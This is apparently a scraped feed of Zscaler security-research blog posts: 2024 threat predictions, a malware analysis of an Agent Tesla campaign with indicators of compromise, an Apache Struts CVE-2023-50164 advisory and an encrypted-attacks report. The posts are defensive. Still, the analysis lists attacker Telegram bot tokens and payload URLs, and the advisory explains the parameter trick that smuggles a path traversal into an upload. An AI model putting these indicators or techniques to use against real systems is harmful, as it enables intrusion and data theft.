2023 will be remembered as the year artificial intelligence (AI) rose to the forefront of our collective consciousness, ushering in never before seen opportunities and risks. The release of generative AI-powered applications like ChatGPT highlights the potential for AI and machine learning (ML) to reshape how organizations operate. In September, the Zscaler ThreatLabz team conducted an analysis of AI/ML and ChatGPT trends amongst enterprises stretching back across 2023 and, unsurprisingly, discovered upward trajectories in AI/ML traffic and usage.
This adoption brings us to the flip side of the generative AI coin: attackers are leveraging AI tools to elevate and automate phishing campaigns, craft extremely evasive malware, and reduce the development time of threats across the board. Security leaders and enterprises find themselves at a new crossroads, tasked with delicately navigating the interplay of securely leveraging AI’s evolutionary advancements while confronting the unforeseen revolutionary challenges of safeguarding against AI-powered threats.
Rampant ransomware — again
The pervasive impact of ransomware resonated widely in 2023. ThreatLabz research revealed a 37% surge in ransomware attacks, accompanied by an average enterprise ransom demand of $5.3 million and an average payment exceeding $100,000. 2023 also saw the rise of Ransomware-as-a-Service (RaaS), a business model in which ransomware authors or gangs sell or lease their services on the dark web. The ransomware family BlackCat group, or ALPHV, emerged as a significant contributor to this unsettling trend, linking back to multiple high-profile attacks against casinos.
Ransomware gangs also got stealthier in 2023, with ThreatLabz observing an increase in encryption-less extortion attacks. The absence of encryption allows attackers to eliminate development cycles and decryption support and quietly exfiltrate data before making ransom demands.
Clop ransomware’s zero day attack on the file transfer tool MOVEit was the largest data theft of 2023, impacting 83 million individuals and nearly 3,000 organizations. This hack served as a stark reminder that the supply chain remains a critical vulnerability in enterprise security.
More sophisticated social engineering
Social engineering attacks were adept at exploiting human vulnerability before—now, with AI part of the equation, these attacks are more of a threat than ever. While AI enhanced the sophistication and effectiveness of common social engineering tactics like phishing and smishing scams, there was a notable shift towards vishing (voice phishing) attacks in 2023. The use of voice communications to deceive victims was particularly effective for the BlackCat affiliate ScatteredSpider—and damaging for the gaming industry. Last year, we witnessed the fast-evolving nature of social engineering attacks, and this evolution poses greater challenges for detection and defense.
The fall of VPNs and firewalls
The cyberthreats and trends of 2023 send a clear message to organizations: they must evolve their security strategies to the times and embrace a zero trust architecture. Legacy, perimeter-based architectures like traditional virtual private networks (VPNs) and firewalls are not only expanding the attack surface, but also exacerbating challenges for organizations that are up against increasingly sophisticated threats and cloud-first demands.
In fact, 2023 saw an increase in VPN vulnerabilities and, accordingly, nearly 1 in 2 organizations reported that they experienced VPN-related attacks.
With 92% of those organizations considering, planning, or in the midst of a zero trust implementation, it’s an encouraging sign that zero trust grew as a priority in 2023.
Enterprise tools under attack
2023 saw threat actors, groups, and families pivot to targeting providers of core enterprise tools. These incidents highlight the increasing vulnerability of the broader digital supply chain and the interconnected nature of enterprise tools that are crucial to daily business operations. Whether driven by financial motives, the theft of valuable credentials, or even geopolitical interests in the case of nation-state attacks, the focus on these tools emphasizes the need for organizations to extend their cybersecurity protocol beyond their organizational walls. The solution? A more mature third party risk management program.
2024 Predictions — AI, RaaS, MiTM (and more)
Many of the past year's most impactful trends and threats will persist, evolve, and shape the enterprise security landscape in the year ahead. Let’s explore five predictions that should be top of mind for security leaders and organizations.
Prediction 1: Generative AI-Driven Attacks
Generative AI-driven reconnaissance, exploitation, and phishing attacks will grow in volume. There is good reason for AI to be at the top of security experts’ predictions list again this year. GenAI and large language mode (LLM) tools will be the great enablers of 2024, continuing to lower the barrier to entry for threat actors. AI empowers threat actors to automate diverse tasks at scale, from identifying exposed assets like firewalls, VPNs, and VDIs to effortlessly compiling lists of known vulnerabilities or crafting sophisticated phishing emails.
This level of scalability afforded by AI automation will undoubtedly continue to enhance the efficiency and reach of malicious activities this year. Reports of malicious versions of ChatGPT, like WormGPT, circulating on the dark web in 2023 signify two concerning trends: the potential for development of new malicious LLMs without any built-in ethical restraints, and the emergence of their use in threat campaigns. From suggesting attack ideas to automating development and execution processes, these AI tools have the potential to catapult cyberthreat evolution years into the future in mere months.
What’s more, 2024 is an election year in the United States, and it is a strategic imperative as such to ensure the resilience of critical infrastructure against AI-powered misinformation and other elusive attacks.
Organizations of every type will have to be more vigilant and take proactive security measures, from refreshed employee security training tailored to social engineering and AI-specific threats to holding vendors accountable for delivering AI-powered cybersecurity. We must fight fire with fire and use generative AI, machine learning, and deep learning techniques to protect data, devices, and networks against AI-powered threats.
Prediction 2: Ransomware-as-a-Service Innovation
Ransomware-as-a-Service will innovate and assist in the volume of successful attacks. The RaaS model is poised to further elevate cybercrime and empower less-skilled crime groups in 2024. In addition, we should anticipate a new wave and an increasing prevalence of initial access brokers, similar to Scattered Spider, that specialize in facilitating unauthorized access to target networks. Encryption-less attacks will continue to be a popular strategic tactic used by ransomware operators to evade detection, putting the onus on organizations to focus on detecting anomalous activity beyond the typical patterns associated with encryption-based ransomware.
In navigating these evolving ransomware threats and trends, organizations must prioritize comprehensive zero trust protection strategies for every stage of the attack chain, from initial compromise to execution.
Prediction 3: Rise in Man-in-the-Middle Attacks
Failure to implement a zero trust architecture will result in an increase in man-in-the-middle (MiTM) attacks. MiTM threats will remain a significant concern for enterprises in 2024, exacerbated by Phishing-as-a-Service toolkits that democratize sophisticated MiTM attacks, making them accessible to a broader range of threat actors. This tactic targets users of a specific server or system and captures data in transit, such as user authentication credentials or cookies, by mimicking online services through proxy servers.
The risks associated with MiTM phishing attacks—unauthorized access, data theft, and compromise of critical information—call for zero trust and advanced security measures. Without a proxy-based zero trust architecture, full TLS inspection, and FIDO2 multifactor authentication (MFA), organizations remain exposed to vulnerabilities in communication channels and user authentication. As such, it is imperative to prioritize these security measures in 2024.
Prediction 4: Supply Chain Attacks on Generative AI Ecosystems & Development Environments
Supply chain attacks will target vulnerable generative AI ecosystems. As supply chains become more interconnected and attacks more sophisticated in 2024, both upstream and downstream components of supply chains will be increasingly at risk.
Namely, attackers will leverage new ways to strategically exploit weaknesses in various components beyond traditional attack vectors. As organizations integrate more AI components to their supply chains, LLMs and AI will increasingly be part of supply chain security conversations. If not adequately secured, an AI-powered supply chain can become a target for attackers seeking to poison AI training data, manipulate updates, inject malicious algorithms, engage in prompt engineering, or exploit vulnerabilities as an entry point to compromise organizations' data or systems.
Organizations must recognize the critical role of a resilient supply chain in ensuring business continuity and overall resilience and prioritize investments to safeguard against the far-reaching consequences of supply chain compromise. Eliminating the internet-facing attack surface will be critical, and implementing zero trust security controls to stop lateral movement and block command-and-control activities will be instrumental in doing so. In short, enterprises must adopt a comprehensive approach to safeguard not only their internal AI applications but those of their suppliers, as well.
Prediction 5: Attackers Respond to SEC Regulations
Attacks will shift in response to the cyber regulations imposed by the U.S. Securities and Exchange Commission (SEC). Anticipating the impact of the new SEC regulations mandating disclosure of material breaches, it's likely that attackers will further hone their already adept stealth methods. Expect a heightened focus on covert strategies, leveraging sophisticated evasion techniques and encryption to prolong undetected access. Additionally, attackers may target non-material systems more frequently to navigate under the radar, gather intelligence, and discreetly escalate privileges. With an eye on evading immediate disclosure obligations, we could see a surge in third-party and supply chain vulnerability exploitation. In essence, the future threat landscape may dictate a predictive shift toward even more strategic and discreet approaches as attackers adapt to emerging regulatory frameworks.
The SEC cyber regulations will also drive strategic shifts in security teams. The mandates for timely reporting of material incidents and annual reporting on cyber risk management will be a catalyst for more cross-functional collaboration in 2024. How will organizations prepare and comply with the reporting process? Do they have sufficient defense in depth and security governance? These questions—and their legal implications—will be a forcing function for cyber and corporate alignment. For many companies, this means that CISOs and security leaders will work closer than ever with CEOs, legal teams, and boards to develop processes for disclosure and strengthen their organization’s security posture.
As the new year unfolds, security teams will have their work cut out for them. By prioritizing investments in a zero trust architecture, AI-based security controls, employee training, and strategic planning, you can build resilience and better protect against evolving threats. The Zscaler Zero Trust Exchange counters advanced attacks through TLS/SSL inspection, browser isolation, and policy-driven access controls, stops lateral movement with direct user-to-app connections, and prevents data loss with thorough inspection. Request a customized demo on how Zscaler can help address your organization’s security needs.
Follow Zscaler ThreatLabz on X (Twitter) and our Security Research Blog to stay on top of the latest cyberthreats and security research. The Zscaler ThreatLabz threat research team continuously monitors threat intelligence from the world’s largest inline security cloud and shares its findings with the wider security community.
Forward-Looking Statements
This blog contains forward-looking statements that are based on our management's beliefs and assumptions and on information currently available to our management. The words "believe," "may," "will," "potentially," "estimate," "continue," "anticipate," "intend," "could," "would," "project," "plan," "expect," and similar expressions that convey uncertainty of future events or outcomes are intended to identify forward-looking statements. These forward-looking statements include, but are not limited to, statements concerning: predictions about the state of the cyber security industry in calendar year 2024 and our ability to capitalize on such market opportunities; anticipated benefits and increased market adoption of “as-a-service models” and Zero Trust architecture to combat cyberthreats; and beliefs about the ability of AI and machine learning to reduce detection and remediation response times as well as proactively identify and stop cyberthreats. These forward-looking statements are subject to the safe harbor provisions created by the Private Securities Litigation Reform Act of 1995. These forward-looking statements are subject to a number of risks, uncertainties and assumptions, and a significant number of factors could cause actual results to differ materially from statements made in this blog, including, but not limited to, security risks and developments unknown to Zscaler at the time of this blog and the assumptions underlying our predictions regarding the cyber security industry in calendar year 2024.
Risks and uncertainties specific to the Zscaler business are set forth in our most recent Quarterly Report on Form 10-Q filed with the Securities and Exchange Commission (“SEC”) on December 7, 2022, which is available on our website at ir.zscaler.com and on the SEC's website at www.sec.gov. Any forward-looking statements in this release are based on the limited information currently available to Zscaler as of the date hereof, which is subject to change, and Zscaler does not undertake to update any forward-looking statements made in this blog, even if new information becomes available in the future, except as required by law.
Tue, 02 Jan 2024 08:00:01 -0800Deepen Desaihttps://www.zscaler.com/blogs/security-research/top-5-cyber-predictions-2024-ciso-perspectiveThreat Actors Exploit CVE-2017-11882 To Deliver Agent Tesla
https://www.zscaler.com/blogs/security-research/threat-actors-exploit-cve-2017-11882-deliver-agent-tesla
Introduction
First discovered in 2014, Agent Tesla is an advanced keylogger with features like clipboard logging, screen keylogging, screen capturing, and extracting stored passwords from different web browsers. Recently, Zscaler ThreatLabz detected a threat campaign where threat actors leverage CVE-2017-11882 XLAM to spread Agent Tesla to users on vulnerable versions of Microsoft Office. The CVE-2017-11882 vulnerability is a remote code execution flaw found in the Equation Editor of Microsoft Office. It arises due to a weakness in how the software manages system memory for objects.
In this blog, we examine the tactics employed by threat actors to deploy Agent Tesla malware using CVE-2017-11882. We shed light on the methods used for data theft and evasion strategies like obfuscation and anti-debugging techniques.
Key Takeaways
Threat actors strategically utilize words like “orders” and “invoices” in spam emails to encourage users to download malicious attachments containing CVE-2017-11882.
Threat actors include a VBS file in their infection chain to add a layer of complexity to analysis and deobfuscation attempts.
Threat actors use the RegAsm.exe file to carry out malicious activities under the guise of a genuine operation.
Microsoft Excel Infection Sequence
Threat actors begin the infection sequence by distributing spam emails with malicious attachments (like in Figure 1 and Figure 2 below) in hopes that users on vulnerable versions of Microsoft Excel open these emails and download the attachments.
Figure 1: Spam email example
Figure 2: Spam email example
To make these spam emails seem legitimate, threat actors use words like “invoices” and “order” in the emails. This strategy lends authenticity to fraudulent emails and encourages users to download attachments.
Once a user downloads a malicious attachment and opens it, if their version of Microsoft Excel is vulnerable, the Excel file initiates communication with a malicious destination and proceeds to download additional files without requiring any further user interaction. Figure 3, shown below, depicts how the first additional file downloaded is a heavily obfuscated VBS file.
Figure 3: Malicious communication and additional file download
Figure 4 shows the actual obfuscated VBS file.
Figure 4: Obfuscated VBS file
The VBS file incorporates variable names that are 100 characters long, adding a layer of complexity to the analysis and deobfuscation. The VBS file initiates the download of a malicious JPG file, as in Figure 5 below.
Figure 5: Malicious JPG file (steganography image)
The JPG file contains a Base64-encoded DLL, as shown in Figure 6.
Figure 6: Base64-encoded DLL inside an image
Threat actors inject a Base64-encoded DLL into an image to evade detection from antivirus programs. Once the JPG file downloads, the VBS file executes a PowerShell executable that retrieves the Base64-encoded DLL from the image file, decodes the DLL, and loads the malicious procedures from the decoded DLL. For accurate file retrieval, the threat actors utilize <<BASE64_START>> and <<BASE64_END>> tags. Figure 7, shown below, illustrates the command.
Figure 7: Malicious command that loads and runs the DLL file
After the PowerShell executes, it executes the RegAsm.exe file, as shown in Figure 8 below. While the primary function of RegAsm is typically associated with registry read-write operations, in this context, its purpose is to carry out malicious activities under the guise of a genuine operation.
Figure 8: Process tree and thread injection in RegAsm.exe
From here, the DLL fetches the Agent Tesla payload and injects a thread into the RegAsm process, as shown in Figure 9 below.
Figure 9: Thread injected into RegAsm.exe
Figure 10, shown below, depicts instances where Agent Tesla attempts to steal data from various browsers to send to a malicious destination controlled by threat actors.
Figure 10: Browser data theft
In addition to browser data, Agent Tesla targets credentials from both mail clients and FTP applications, as shown in Figure 11.
Figure 11: Agent Tesla steals data from Outlook
As shown below in Figure 12, Agent Tesla attempts to deploy keyboard and clipboard hooks to monitor all keystrokes and capture data copied by the user.
Figure 12: Keyboard and clipboard hooks
In Figure 13 below, Agent Tesla uses window hooking, a technique utilized to monitor event messages, mouse events, and keystrokes. When a user acts, the threat actor's function intercepts before the action occurs.
Figure 13: Window hooking
From here, the malware sends the exfiltrated data to a Telegram bot controlled by the threat actor, as shown in Figure 14 below.
Figure 14: Exfiltrate to Telegram
Conclusion
Our blog provided an overview of the tactics employed by threat actors exploiting CVE-2017-11882 to deliver Agent Tesla, from their methods of data theft to evasion strategies, like obfuscation and anti-debugging techniques. Our analysis highlights how threat actors constantly adapt infection methods, making it imperative for organizations to stay updated on evolving cyber threats to safeguard their digital landscape.
In addition to staying on top of these threats, Zscaler's ThreatLabz team continuously monitors for new threats and shares its findings with the cybersecurity community.
Zscaler Coverage
Win32.Backdoor.Agenttesla.LZ
XLS.Exploit.CVE-2017-11882
DOC.Exploit.CVE-2017-11882
Indicators of Compromise (IOCs)
Telegram URLs used for exfiltration
api.telegram[.]org/bot6362373796:AAFAjB2uG5ePhAcUiHforF23Ij_H_LDLFUs
api.telegram[.]org/bot6475150763:AAFSaMWIpAeiCNQFdS0vxz0W6HCxWx96MFk/sendDocument
api.telegram[.]org/bot6663697988:AAHBsfmbPr_JinYR7jDRpZloxUBi6EcQ6HE/sendDocument
Malicious URLs
79.110.48[.]52/nicko.vbs
79.110.48[.]52/nix.txt
193.42.33.51/knog.txt
Malicious Excel files
201CD0A2FC6A87D25D6AED1E975FAE71 (CVE-2017-11882)
38f6b4d5804de785b925eb46ddd86d6f (CVE-2017-11882)
C1521547DEA051BD7A007516511FB2CA (CVE-2017-11882)
dddabc8019a7184055301927239a9438 (CVE-2017-11882)
Malicious VBS files
F302ADDF3B4068888788D8EDCE8F52A0
1402E4408F123DA1E9BC3BDE078764FC
A1C2B285A7FF9DD99C70E4D750EFEA51
Malicious JPG files
8496654930be3db6cea0ba62ffe5add9
d6f8c9a88cbdd876695f4bef56972f2e
8d17b59e8bb573b12a9d0e42746f8aef
Malicious DLL files
8955B482E59894864BACE732302A9927
F5F51251DC672E1934746E0057011B1A
5630282A95AFD2A5CEEECC5ACF7FF053
Malicious executables
547b88c4aa225377d7d65e912d81fe28
87aa9fc1bf49d48234160a15515a8145
0ada110f82ce64fcfab0eb0e5d8d948e
32e9af7d07a5edcc9bf9b5c8121acc55
b551da554933c2c064f96aaa6aa9ff55
7ea06a0e6c1e5707a23364ae6984b4f3
f3f27883dc91a7c85a03342bf6fed475
7c9ad2b73748f8c745d5d49b9b4876c5
a8c8010963f35fc3253d6409c169a9f2
d6a1feb6cfa307c5031ea2dd2118d786
069bb6a37f9312ba4fea6c70b7134d39
6bdb7a11d0eaa407e7a7f34d794fb567
f11d72bc4192b2ed698cc2b0200773bf
a55302ad4bf2f050513528a2ca64ff01
01b02fc9db22a60e8df6530a2e36a73b
43ec3cc0836bd759260e8cf120b79a7b
5477e3714c953df2bb3addf3bebbda9a
be1858db74162408c29c8b8484b3cf88
38bb6b06907c6e3445aa23c8d229e542
05bc545b9b0de1ccb4254b59961ea07b
25a697d0e6c5fa06eea8ba0d3ae539da
8a081a4f6c497c60c6e72dfabfe30326
ad0f5f4994a2998f0e1ed3323884837c
092ff92d9bfa9cac81a8b892d495f42e
09f197fc8d69ec14875723f1e6e623bf
0eba69a4ad399db14a2743b4d68f13e8
19eab6a97cea19473bda3010066c5990
cb2b5646d68279aea516703df3c4c1e9
3247ad04996dd2966800153e7ea14571
92d1ece422670dbf9a3e1aef45612b5c
f25da7cd5fb33e7a0967dbcdf008bd9a
a7f2d131a2f3f61978ec17395f7b34b1
39088a9e4ad3e7a8ba4686641569dbcd
210e9a89b723b3246a7d590c9a428c83
efc3a41ecae822eba861cb88c179c80e
c01e90db99bcc939f829a181aef2c348
b18ba839dfd653b07b984330dd85b57a
a8e8d4667f96ea847d18eb7830fb1dc6
c38b8d525f48cbdf92381274059d8f0b
6e0dafacdeee6f2d9463d0052db5cce8
b6f892c73fa0f491072592d7baf0c916
bf9d9c9a95fdb861c583dc9b66bcf5ab
0043f65755a700b94a57118a672df82c
adbf1e2f49d842aac524d7ac351ca5b4
d55bdb3593664d806794d00025390081
935e75cbd0f207bfeb6d3b5d90e35685
db4bfb57c7acd8d568a06a9c3739e146
08e1955de35005b335be2e100d2d4a3c
e57882623add29cbfa8c93d011b52c44
e6c4636c331af09568a68dcf3614cfa4
be71e90f09a38adfe22d34e3dd044fad
e9d4e5b8b80dcb4fcf5af8413066434e
413af1ff38e6a4e205c6f487d042b457
f1a1542bbccea9a4e6746040d85eae1b
05d60c7be299fc0220ffcaf3b1482652
5373b6dce20bbb0218034aa9bf0c20df
1e22cd428f5baf23877a8189469ed92a
b76d8d59b53f58dd876951044e6d88b9
a29585da474f79a723894c1a56f65b85
2639c8b09f744e95ba612c89ef26e02c
bba5761789159b5a1a23566506358c15
3d8414800762efb9276a999fc477211b
f0af137175487b4d1249921ce506efe9
2123f750f5b854b439349576118d9b9d
7b6ec969d4110722b427de45ca1c0d42
6dfc461ecf4f2fe4c5f44cdeb6792226
0708c52198a49bc7ab16bce19472598a
00b28f548f14de4f53abd6651bf78b98
ea1472bad426efded678a15c9a14bf34
dadb38b97d45d7438fbd43911a71d844
d7ebf4ab7bb0ab685e3902349d637e9b
aff1e141f15d808d5d4f549ea99c1e4d
bbc7c66b301d3087cfdaa89528832895
e6926fc50f40c5c5feb676b0adcb7655
3c3580dfbc1f06636fe5696879cbdd85
b7dba4e30a73f58740d316c46645b759
7b1bc15873c39866b429d44da8640285
Agent Tesla pilfers data from the following browsers:
Edge Chromium
Postbox
Iridium Browser
Elements Browser
Citrio, CentBrowser
Epic Privacy
SeaMonkey
Vivaldi
Yandex Browser
Amigo
7Star
Kometa
IceCat
Cool Novo
Flock
Coowon
360 Browser
Brave
WaterFox
Chromium
Liebao Browser
CyberFox
PaleMoon
Thunderbird
QIP Surf
Sleipnir 6
Sputnik
IceDragon
Coccoc
K-Meleon
Comodo Dragon
Chedot
Opera Browser
BlackHawk
Firefox
Torch Browser
Uran
Orbitum
Agent Tesla tries to steal credentials from the following mail and FTP clients:
Paltalk
WinSCP
Safari for Windows
FTP Navigator
Discord
Falkon Browser
Mailbird
QQ Browser
ClawsMail
Pidgin
Eudora
FTPGetter
Becky!
eM Client
IncrediMail
JDownloader 2.0
Psi/Psi+
FoxMail
FtpCommander
Flock Browser
FileZilla
Outlook
WS_FTP
OpenVPN
Private Internet Access
IE/Edge
SmartFTP
DynDns
Opera Mail
Trillian
CoreFTP
MysqlWorkbench
PocoMail
Flash
FXP
UC Browser
NordVPN
Internet Downloader Manager
Windows Mail App
Tue, 19 Dec 2023 11:17:52 -0800Kaivalya Khursalehttps://www.zscaler.com/blogs/security-research/threat-actors-exploit-cve-2017-11882-deliver-agent-teslaCoverage Advisory for CVE-2023-50164: Apache Struts Path Traversal and File Upload Vulnerability
https://www.zscaler.com/blogs/security-research/coverage-advisory-cve-2023-50164-apache-struts-path-traversal-and-file
Introduction
On December 7, the Apache Software Foundation released Apache Struts versions 6.3.0.2 and 2.5.33 to address a critical vulnerability currently identified as CVE-2023-50164, which is a path traversal flaw allowing a malicious file to be uploaded and potentially lead to Remote Code Execution (RCE) on affected versions of Apache Struts.
Recommendations
Zscaler ThreatLabz recommends users on Apache Struts software upgrade to versions Struts 2.5.33, Struts 6.3.0.2, or higher to avoid this vulnerability.
Affected Versions
The following versions of Apache Struts are affected by the vulnerability and should update immediately:
Struts 2.0.0 - Struts 2.3.37 (EOL)
Struts 2.5.0 - Struts 2.5.32
Struts 6.0.0 - Struts 6.3.0
Background
CVE-2023-50164 is a path traversal flaw that allows a remote attacker to upload malicious files to vulnerable servers. After successful exploitation, an attacker can achieve Remote Code Execution (RCE) on the target server. An attacker exploiting such a vulnerability can access, upload, or modify important files, steal sensitive information, disrupt critical services, or move laterally on the breached network.
CISA released an alert to upgrade to the latest version of Apache Struts for protection from this vulnerability.
According to the Shadowserver scanning platform, some threat actors may have started exploiting publicly exposed vulnerable Apache Struts servers. In addition, a post by Akamai indicates that attackers may be adding new arguments and modifying a publicly available Proof-of-Concept (PoC) to further exploit CVE-2023-50164.
How It Works
The attacker accesses a vulnerable version of Apache Struts to send an HTTP POST request to upload a malicious file.
In the POST request, the attacker uploads a file with malicious content using the 'Upload' parameter name (instead of 'upload'). Within the same request, the attacker adds another parameter named 'uploadFileName' (instead of 'UploadFileName').
Figure 1 is a condensed example of a request.
Figure 1: Part of the HTTP POST request
The 'uploadFileName' parameter contains path traversal characters (../), which manipulate the filename present in the ‘Upload’ parameter, allowing an attacker to bypass the built-in check – effectively evading the getCanonicalName method (a method used to truncate '/' & '\' characters in the filename) — and leave the path traversal payload in the final filename. From here, the file (with the malicious payload) is uploaded to the attacker’s chosen directory.
If the file contains WebShell code, the attacker can escalate access to the vulnerable server, leading to RCE and ultimately gaining access to the target server.
Figure 2: Attack chain depicting an attacker exploiting CVE-2023-50164
Zscaler Best Practices
Safeguard crown jewel applications by limiting lateral movement using Zscaler Private Access™ with application security modules turned on.
Route all server traffic through Zscaler Private Access™ with additional application security module enabled and Zscaler Internet Access™, which provides visibility to identify and stop malicious activity from compromised systems/servers.
Turn on Zscaler Advanced Threat Protection™ to block all known command-and-control domains — thereby adding another layer of protection if an attacker exploits this vulnerability to implant malware.
Extend command-and-control (C2) protection to all ports and protocols with the Zscaler Cloud Firewall™ (Cloud IPS module), including emerging C2 destinations. Doing so provides additional protection if the attacker exploits this vulnerability to implant malware.
Use Zscaler Cloud Sandbox™ to prevent unknown malware from being delivered as part of a second-stage payload.
Inspect all TLS/SSL traffic and restrict traffic to the critical infrastructure from the allowed list of known-good destinations.
Conclusion
Addressing CVE-2023-50164 is crucial for protecting the digital security of Apache Struts systems and users. By manipulating file upload parameters, uploading malicious files, and achieving RCE on the target server, an attacker can take control — stealing sensitive information, leading to severe disruptions for impacted systems and users. To mitigate this risk, upgrade vulnerable Apache Struts software systems to Struts 2.5.33, Struts 6.3.0.2, or higher.
Zscaler Coverage
The Zscaler ThreatLabz team has deployed protection for the CVE.
Zscaler Advanced Threat Protection
HTML.EXPLOIT.CVE-2023-50164
Zscaler Private Access AppProtection
Local File Inclusion: 930100 - Path Traversal Attack (/../) - Encoded Payload
Local File Inclusion: 930110 - Path Traversal Attack (/../) - Decoded Payload
Details related to these signatures can be found in the Zscaler Threat Library.
References
https://lists.apache.org/thread/yh09b3fkf6vz5d6jdgrlvmg60lfwtqhj
https://www.cisa.gov/news-events/alerts/2023/12/12/apache-software-foundation-updates-struts-2
https://trganda.github.io/notes/security/vulnerabilities/apache-struts/Apache-Struts-Remote-Code-Execution-Vulnerability-%28-S2-066-CVE-2023-50164%29
https://thehackernews.com/2023/12/new-critical-rce-vulnerability.html
Mon, 18 Dec 2023 08:55:37 -0800Nishant Guptahttps://www.zscaler.com/blogs/security-research/coverage-advisory-cve-2023-50164-apache-struts-path-traversal-and-fileExploring Encrypted Attacks Amidst the AI Revolution
https://www.zscaler.com/blogs/security-research/exploring-encrypted-attacks-amidst-ai-revolution
Introduction
Zscaler ThreatLabz researchers analyzed 29.8 billion blocked threats embedded in encrypted traffic from October 2022 to September 2023 in the Zscaler cloud, presenting their findings in the Zscaler ThreatLabz 2023 State of Encrypted Attacks Report. In addition to the blocked threats, this report leverages insights from 500 trillion daily signals and 360 billion daily transactions in the Zscaler Zero Trust Exchange™. In this blog post, we’ll unpack key findings from the report.
Encrypted Attacks
According to the Google Transparency Report1, encrypted traffic saw a significant rise in the last decade, reaching 95% of global traffic today compared to 48% in December 2013. It’s no surprise that encrypted traffic, once hailed as the secure choice for online activities, now also harbors the majority of cyber threats – like malware, phishing scams, and data leaks.
85.9% of Attacks are Encrypted
Almost 86% of attacks use encrypted channels across various stages of the kill chain. From the initial phases of phishing and malware delivery to the subtleties of command-and-control activities as well as data exfiltration, cybercriminals leverage encryption to shield their intentions. To combat this, Zscaler recommends organizations proactively inspect all encrypted traffic to detect, decrypt, and thwart these attacks.
78.1% of Encrypted Threats Involve Malware
Cybercriminals conceal a variety of threats in encrypted traffic. However, malware remains the predominant threat type, comprising 78.1% of encrypted attacks blocked by the Zscaler cloud, including malicious scripts, payloads, web content, websites, and email attachments.
Figure 1: Distribution of encrypted threats
The surge in encrypted malware blocks highlights the trend where these threat actors are trying to establish an initial foothold in the victim environment by evading legacy detection technologies that often struggle to inspect TLS traffic at scale.
Phishing Increased by 13.7%
The growth observed in phishing attacks is likely powered by the availability of AI tools and plug-and-play phishing services (aka Phishing-as-a-Service offerings) making it that much easier to execute phishing campaigns.
Five of the most phished brands involve:
Microsoft
OneDrive
Sharepoint
Adobe
Amazon
Figure 2: Adobe-themed phishing campaign
Manufacturing Still the Most Targeted Sector
Manufacturing remains the most targeted industry, experiencing 31.6% of encrypted attacks.
Figure 3: A table showing encrypted attack trends by industry
Manufacturers also saw the largest amount of AI/ML transactions compared to any other industry processing over 2.1 billion AI/ML-related transactions. As smart factories and the Internet of Things (IoT) become more prevalent in manufacturing, the attack surface is expanding and exposing the sector to more security risks and creating additional entry points that cybercriminals can exploit to disrupt production and supply chains. The use of popular generative AI applications, like ChatGPT, on connected devices in manufacturing heightens the risk of sensitive data leakage over encrypted channels.
Zscaler Secures Organizations Against Encrypted Attacks at Scale
The report’s main takeaway is this: if you’re not looking at encrypted channels, you don’t know if you’re suffering data leaks or if advanced threats are entering your environment. To help our customers stay secure, Zscaler blocked nearly 30 billion threats over encrypted channels in 2023—a 24.3% increase from the 24 billion blocked in 2022.
Today, most attacks leverage SSL or TLS encryption, which is resource-intensive to inspect at scale and best done with a cloud native proxy architecture. While legacy firewalls support packet filtering and stateful inspection, their resource limitations make them poorly suited for this task. This creates a critical need for organizations to implement cloud native architectures that support full inspection of encrypted traffic in alignment with zero trust principles.
Figure 4: TLS inspection provides full visibility to block advanced threats
How Zscaler Helps Mitigate Encrypted Attacks
Deepen Desai, Chief Security Officer, Zscaler, says:
“While 95% of web traffic is encrypted with HTTPS, we are seeing that the large majority of threats are now delivered over encrypted channels. As a result, any traffic encrypted with SSL/TLS that does not undergo inline inspection to defend against the full gamut of threats can pose a significant risk to global organizations.”
Desai recommends the following solutions to protect your organization from encrypted attacks consistently:
Zero Trust Network Access (ZTNA) - Disrupt as many stages of this attack chain as possible, maximizing your chances of stopping the attack even if the threat actors evade some of your security controls. I recommend replacing vulnerable appliances like VPNs and firewalls with ZTNA to inspect and scan 100% of SSL/TLS traffic.
Zscaler Private Access (ZPA) - Implement consistent security with enhanced segmentation, connecting users to applications, not the entire network. ZPA is designed to provide secure and direct access for users to specific applications, ensuring that network traffic is segmented, and users don’t have access to the entire network.
Zscaler Cloud Data Loss Prevention (DLP) - Integrate Zscaler Cloud DLP as an in-line data loss prevention technology with full TLS inspection to prevent sensitive data leakage.
Best Practices for Mitigating Encrypted Attacks
Your cybersecurity strategy should include controls for each of these stages:
Minimize the attack surface by making internal apps invisible to the internet.
Prevent compromise by using cloud native proxy architecture to inspect all traffic inline and at scale, enforcing consistent security policies.
Stop lateral movement by connecting users directly to applications (rather than the network) to reduce the attack surface, and contain threats by using deception and workload segmentation.
Stop data loss by inspecting all internet-bound traffic, including encrypted channels, to prevent data theft.
If you’re looking to minimize the risk of encrypted attacks for your organization, you should consider these recommendations as part of your adoption strategy:
Use a cloud native, proxy-based architecture to decrypt, detect, and prevent threats in all encrypted traffic at scale.
Leverage an AI-driven sandbox to quarantine unknown attacks and stop patient zero malware.
Inspect all traffic, all the time, whether a user is at home, at headquarters, or on the go, to ensure everyone is consistently protected against encrypted threats.
Terminate every connection to allow an inline proxy architecture to inspect all traffic, including encrypted traffic, in real-time—before it reaches its destination—to prevent ransomware, malware, and more.
Protect data using granular context-based policies, verifying access requests and rights based on context.
Eliminate the attack surface by connecting users directly to the apps and resources they need, never to networks.
Best Practices for Safe AI/ML Interactions
Considering the rapid advancement and adoption of AI-powered applications, it is crucial to establish and follow best practices to ensure the responsible and secure use of these transformative technologies.
Organizations must proactively adapt their AI usage and security policies to stay ahead of potential risks and challenges.
Implement TLS inspection for public AI chatbot applications like ChatGPT using granular DLP policies to prevent sensitive data leakage.
Ensure that the use of AI tools complies with all relevant laws and ethical standards. This includes data protection regulations and privacy laws.
Establish clear accountability for the development and deployment of AI tools. Define roles and responsibilities within your organization to oversee AI projects.
The development and integration of AI tools should follow a Secure Product Lifecycle Framework to guarantee the highest level of security.
Learn More
Download your copy of the full Zscaler ThreatLabz 2023 State of Encrypted Attacks Report to discover more insights and advice for managing encrypted attacks.
1. https://transparencyreport.google.com/https/overview?hl=en
Thu, 14 Dec 2023 10:01:01 -0800Deepen Desaihttps://www.zscaler.com/blogs/security-research/exploring-encrypted-attacks-amidst-ai-revolutionCyber attacks during the holidays: Tips and Trends
https://www.zscaler.com/blogs/security-research/cyber-attacks-during-holidays-tips-and-trends
Introduction
